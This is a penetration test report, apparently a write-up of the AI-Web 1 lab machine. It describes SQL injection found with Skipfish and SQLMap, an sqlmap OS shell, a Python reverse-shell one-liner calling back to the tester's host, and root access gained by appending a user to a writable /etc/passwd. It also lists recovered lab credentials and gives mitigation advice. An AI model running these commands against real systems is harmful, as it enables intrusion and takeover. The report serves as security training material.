PENETRATION TESTING

Alpha ..
2
 Table of Contents

FINDINGS OVERVIEW .................................................................... 4

RECOMMENDATIONS ................................................................... 4
SEVERITY SCALE ........................................................................... 5
INFORMATION GATHERING ........................................................... 7
ENUMERATION.............................................................................. 7
VULNERABILITY ASSESSMENT ................................................... 14
EXPLOITATION ........................................................................... 20
begin exploitation by further enumeration of the AIWEB1 MySQL
database. ............................................................................................... 20
Enumerating TABLE data: ...................................................................... 20
Dumping data for TABLE ‘user’: ............................................................. 20
OTHER ISSUES ............................................................................... 33

3
FINDINGS OVERVIEW
While conducting the external penetration test, there were several critical
vulnerabilities discovered in the AI-Web network. was able to gain full
administrative privilege to the AIWEB1 corporate server. This was possible
due to a vulnerable web-application, which led to remote system access,
then full administrative control was gained through improperly set
permissions to a critical system file. A brief technical overview is listed
below:

o Target: AIWEB1 – Low-privilege shell was obtained by performing a

SQL Injection attack against AI-Web’s web-app ‘se3reTdir777’ found
at URL: http://10.10.10.4/se3reTdir777/ , granting access as the
HTTP service account ‘www-data’. Once access was established,
privilege escalation was possible due to the write permissions of
‘www- data’; allowing the creation a new administrative user (‘user1’)
to the ‘/etc/passwd’ file, after which, the could issue the command
‘su user1’ and provide the password of ‘password’ giving them full
root access.

RECOMMENDATIONS

o Implement Prepared Statements with Parameterized Queries.

Injection attacks remains the most common attacks leveraged against
web applications. One of the most effective mitigation strategies for
preventing SQL Injection attacks is the implementation of Prepared
Statements with Parameterized Queries.

o Implement User Input Whitelisting. Another very useful mitigation

against SQL Injection attacks is to validate the supplied user input. One

4
 should never trust that user input is safe and therefore should be
checked for a set of disallowed characters.
o Require Secure Coding Training for Developers. Developers are
on the front lines of security for any organization and should be
prepared to be the first line of defense. Training in secure coding
techniques and practices will help ensure that your organization’s
applications are developed using the most secure code possible,
thus reducing your attack-surface and lowering your overall risk.

o Implement Network Security Devices. Putting up a few fences can

go a long way to increasing your security posture and is a key piece
of the Defense-in-Depth puzzle. By adding a Web Application
Firewall (WAF), Next-Gen Firewall, and/or Intrusion
Detection/Prevention System, you can significantly increase your
ability to stop intruders from accessing your systems.

o Perform Permissions Audit of System Files. Permissions

misconfigurations are a common occurrence and can be leveraged to
gain full administrative. Performing a baseline and then scheduled
audits of the permissions to system files can ensure those files and
their permissions are following security best-practices. Service
accounts should not be owners of sensitive operating system files
that control local user-accounts.

SEVERITY SCALE

CRITICAL Severity Issue: Poses immediate danger to systems, network,

and/or data security and should be addressed as soon as possible.
Exploitation requires little to no special knowledge of the target. Exploitation
doesn’t require highly advanced skill, training, or tools.

HIGH Severity Issue: Poses significant danger to systems, network, and/or

5
data security. Exploitation commonly requires some advanced knowledge,
training, skill, and/or tools. Issue(s) should be addressed promptly.

MEDIUM Severity Issue: Vulnerabilities should be addressed in a timely

manner. Exploitation is usually more difficult to achieve and requires
special knowledge or access. Exploitation may also require social
engineering as well as special conditions.

LOW Severity Issue: Danger of exploitation is unlikely as vulnerabilities offer

little to no opportunity to compromise system, network, and/or data security.
Can be handled as time permits.

INFORMATIONAL Issue: Meant to increase client’s knowledge. Likely no actual

threat.

6
INFORMATION GATHERING

The given a scope of host(s) from AI-Web that includes the AI-Web
corporate server. You can see the network details of that device listed
below:

- Hostname: AIWEB1
- IP Address: 10.10.10.4
- MAC Address: 00:0C:29:87:86:E3

able to verify the IP address and connectivity of the AIWEB1 host/server by

connecting to the AI-Web network and performing a ping-sweep of the
network which returned the IP Address of 10.10.10.4 for AIWEB1.

ENUMERATION

performed service enumeration to discover information about the services

provided by AIWEB1 that reveal may critical details that could be leveraged
to bypass security and gain an initial foothold into the system.

7
 began by scanning all ports on AIWEB1 with Nmap to determine which
services were open. *In some cases, some ports may not be listed

The initial Nmap scan discovered that only TCP port 80 is open on target
AIWEB1. then performed a more focused Nmap scan to gather more
detailed information.

8
The detailed Nmap scan revealed that a ‘robots.txt’ file is being used to
hide 2 directories from search engine crawlers. A manual browsing of this
file verifies this finding.

Further enumeration, both automated and manual, revealed more sensitive

data that proved to be crucial to gaining database and system access.

Directory fuzzing results of ‘/m3diNf0/’ web directory using GoBuster.

9
Directory fuzzing revealed nothing about immediately useful from the
‘/se3reTdir777/uploads/’ web directory.

10
Directory fuzzing results of ‘/se3reTdir77/’ web directory using GoBuster.

then able to browse to these web pages to gain more information.

http://10.10.10.4/m3diNf0/info.php

11
http://10.10.10.4/se3reTdir777/index.php

12
13
VULNERABILITY ASSESSMENT

The vulnerability assessment is done in an attempt to verify that a

vulnerability exists that may be exploitable by an attacker. It was at this time
that employed a variety of web application vulnerability scanners, such as
Skipfish and SQLMap, which were successful at discovering an
exploitable vulnerability (SQL Injection). This vulnerability was then
leveraged by to gain initial system access.

Vulnerability Exploited: SQL Injection

Vulnerability Explanation: SQL injection attacks occur when a web

application does not perform any validation against the values received from
objects like web forms, user input parameters, cookies,
etc., before passing them to SQL queries that are to be executed on a
database server. This facilitates a way for an attacker to manipulate the
input so that the data is interpreted as a part of the code instead of user
supplied data.

Vulnerability Mitigation: Instantiate the use of Prepared Statements with

Parameterized Queries.

o OWASP Parameterization Cheat Sheet

o OWASP SQL Injection Prevention Cheat Sheet

Severity: CRITICAL

Vulnerability Assessment Steps:

scanned for security vulnerabilities by first utilizing the web-app

vulnerability scanning tool, Skipfish.

root@kali:~/# skipfish -o ./skipfish_report_aiweb1_se3reTdir777

http://10.10.10.4/se3reTdir777/

14
The results are saved in the given directory path and can then viewed by
opening the generated ‘index.html’ with a web browser of choice.

15
To see more detail about the issues presented, click on the issue then click
on the ‘[ show trace + ]’ link.

16
From here we can see the data passed by Skipfish to the AIWEB1 web
application as well as the response sent back, which indicates vulnerability to
Error-Based SQL Injection attacks.

The Skipfish trace report shows that the scanner sent a request of
‘uid=1 ‘ “&Operation=Submit’ and the server returned a SQL syntax
error pointing to where the error might have occurred.

It was at this point that manually confirmed the vulnerability.

17
18
The vulnerability scanner SQLMap was also used to verify, the found SQL
Injection vulnerability and enumerate the database name.

root@kali:~# sqlmap -u http://10.10.10.4/se3reTdir777/ --

data=”uid=1&Operation=Submit” –dbs

are now ready to move on to the next phase of testing.

19
EXPLOITATION

In the Exploitation phase, will attempt to exploit found vulnerabilities within

your operating system, applications, and data. The end goal for the tester is
to attempt to penetrate into the target environment, gaining as much
privilege as possible, and avoiding detection while doing so.

All will stay within the scope that was determined during pre-engagement
activities and documentation.

Gaining Low-Privilege Shell

The succeeded in gaining Remote Code Execution (RCE) by leveraging

the discovered SQL Injection vulnerability chaining together SQLMap, Linux
Bash commands, and Python commands.

begin exploitation by further enumeration of the AIWEB1 MySQL database.

Enumerating TABLE data:

Dumping data for TABLE ‘user’:

20
21
Dumping data for TABLE ‘systemUser’:

3 user accounts are discovered with Base64 encoded passwords. The

passwords are decoded, and the credentials are recorded.

1. t00r : FakeUserPassw0rd
2. aiweb1pwn : MyEvilPass_f908sdaf9_sadfasf0sa
3. u3er : N0tThis0neAls0

22
Low-Privilege Shell Access via SQLMap:

root@kali:~# sqlmap -u http://10.10.10.4/se3reTdir777/ --

data=”uid=1&Operation=Submit” –os-shell

The now have verified RCE on AIWEB1 and now will attempt to obtain a
fully interactive TTY shell. This is desired for 2 reasons:

1. The SQLMap shell isn’t always returning command output consistently

2. The SQLMap shell doesn’t work well with commands like cd, sudo, su,
etc.

took the following steps to reach this goal…

23
then checked to see if Python was installed:

24
Start a listener to catch the incoming connection with Netcat on their Kali
Linux system:

root@kali:~# ncat -vnlp 9999

Using the SQLMap shell and Python, then execute a new shell connection
from AIWEB1 to the tester’s Kali Linux Netcat listener.

os-shell> python -c "exec(\"import socket, subprocess;s =

socket.socket();s.connect(('10.10.10.3',9999))\nwhile 1: proc =
subprocess.Popen(s.recv(1024), shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())
\")"

Connection is successfully made to Kali from AIWEB1. The new shell is

much more stable and consistent, but still isn’t a fully interactive TTY shell.
To obtain the desired TTY, one more shell connection will need to be made.

In a new terminal session, start another Netcat listener over TCP port 8888 on
their Kali Linux system…

root@kali:~# ncat -vnlp 8888

…and issue the following Bash one-liner from the previous Python shell
terminal session:

25
26
Connection is successfully made to new terminal session and Python is used
to create fully interactive TTY shell:

Now that a fully interactive TTY shell session had been established,
began the process of looking for a way to elevate privileges. Through
manual exploration of system files, a vulnerability was discovered that
allowed to gain full administrative/root privileges to the AIWEB1 server.

Gaining full root access:

After checking file permissions for many common system files, quick
discovered a permissions misconfiguration for the ‘/etc/passwd’ file.

Since had gained access through the ‘www-data’ service account, they
found themselves with ownership and write permissions to the
‘/etc/passwd’ file. This allowed them to create a new user account entry
with root privileges and a password of their choice.

27
This was accomplished using the following steps.

28
From terminal in Kali, created a SHA-512 hashed password of ‘password’:

From terminal in Kali, then created a text file containing the required fields
for a user account entry in a standard /etc/passwd file.

This file (user1.passwd) contains all the information to login as ‘user1’ with
password of ‘password’.

From terminal in Kali, use Python to serve the user1.passwd file with HTTP.

From the shell connection to AIWEB1, downloaded the ‘user1.passwd’ file

using the ‘curl’ command, saving the file to the ‘/tmp’ directory of AIWEB1.

29
 then able to append the contents of the ‘user1.passwd’ file into the
‘/etc/passwd’ file.

30
At this point, able to login with the ‘user1’ account and were granted root
privileges to the AIWEB1 server.

then used their root privileges to access privileged files that contain
sensitive data. These were the ‘/root/flag.txt’ and ‘/etc/shadow’ files.

31
32
OTHER ISSUES

able to login with the ‘aiweb1pwn’ account password discovered in the

enumeration of the MySQL database.

Severity: LOW

33
34
 discovered login credentials for the MySQL database which allowed a
successful local login to said database.

Severity: LOW

35
36